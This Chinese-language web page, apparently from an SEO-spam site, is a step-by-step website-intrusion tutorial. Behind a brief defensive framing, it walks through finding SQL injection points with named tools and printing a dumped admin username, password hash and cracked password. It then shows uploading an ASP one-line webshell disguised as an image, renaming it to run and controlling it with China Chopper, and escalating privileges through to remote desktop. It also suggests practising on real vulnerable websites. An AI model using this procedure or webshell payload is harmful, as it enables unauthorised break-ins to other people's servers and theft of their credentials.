黑客如何进行网站入侵实战教程_蜘蛛技巧_超级蜘-蛛-池

我们都知道建设网站的初期要设置好域名空间、建站程序、主题内容。这些是建设一个好网站的基本要素，但是如何确保网站能够安全、良好的运营下去，这是每一个站长都需要考率的问题。建议各位站长在网站建设之初，就要将网站的安全问题考虑在内，否则一旦网站被黑，解决费时不说，导致网站被K也是很平常的事情。

俗话说的好知己知彼，百战百胜，只有了解黑客常用黑站方法，我们才能够有针对的做好防御策略。

下面的这些工具是黑客比较常用的工具

1、找注入 爆账号啊D和明小子

2、注入工具椰树扫描、流光、Pangolin（穿山甲）、havij（胡萝卜）

3、找后台御剑后台扫描、wwwscan扫描器

4、传小马各种一句话木马、中国菜刀、中国蚁剑5、提权pr提权工具、黑协提权工具

接下来就直接渗透一个网站案例，下面来演示各种工具的使用方法：

实验环境大家可以用虚拟机或者本地进行模拟操作，或者找些漏洞较多，比较垃圾的网站进行操作。

演示开始：

步骤一：找注入打开浏览器，推荐用火狐浏览器或谷歌浏览器。出现下图的页面，这里用ie演示。

IE浏览器的选项设置，新手建议全部显示反馈的错误信息，根据实际情况来，就可以准确的判断网页的信息。直接用啊D注入工具和明小子配合检测使用

成功找到注入点，如下图：

步骤二：爆账号右键找到的注入点——注入检测

点击右上角的检测开始注入检测

最后得到网站的某个账号，用户名：linhai ，密码：d7e15730ef9708c0一般来说，数据库存放的密码应该是经过md5加密过的，不用担心，只需要用解密MD5工具一下就可以解密，百度一下，解密工具很多，这里推荐：http://www.dmd5.com解密md5后得到的密码为：linhai19760812

步骤三：找后台【可以用御剑后台扫描器扫描】此步骤为找到网站的管理后台。

接下来，访问扫描到的后台地址，登录。地址：/admin/login.asp

直接登录网站后台，到这里，已经成功获得网站后台管理权限了。

步骤四：传小马记住黑客入门教程里面的一句话，先传小马，再传大马，找到上传点就不会错，稳拿下。由于是asp的站点，确定需要的是asp一句话木马，代码为<%eval request("x")%>，密码为x网站后台的上传点可能很多，有的可行，有的不行，可以多试试，我们的目的就是通过这些上传点，把我们的木马上传到网站服务器，从而控制网站。通常成功率比较高的上传点是上传图片附件，如下图：

做个木马，打开txt文档，写上asp一句话<%eval request("x")%>，密码是x。并且把文件类型改成图片，不要只写一行代码，不大不小，100行差不多。

然后上传。接下来的思路就是利用网站的数据库功能，把我们上传的文件后缀由jpg改成asp。

然后，就可以用菜刀，连接刚才复制到根目录的xbk.asp文件（木马）。打开菜刀，在空白处右键——添加，输入木马的地址和网站。

步骤五：拿权限接下来主要用提权三件套：cmd.exe、pr.exe、3389.bat ，把这3个工具，用菜刀上传到回收站目录下面。接下来，进入我们上传的cmd.exe虚拟终端，执行我们的提权三件套。

不仅仅这种方法可以成功，不同的思路可以转变，或许过程会很顺利，也或者防护很多，没办法顺利入侵成功。执行完成后，打开远程桌面，用刚才提权的账号，进入服务器。

到此为止，一个完整的渗透过程结束，已经成功获得服务器的管理权限了。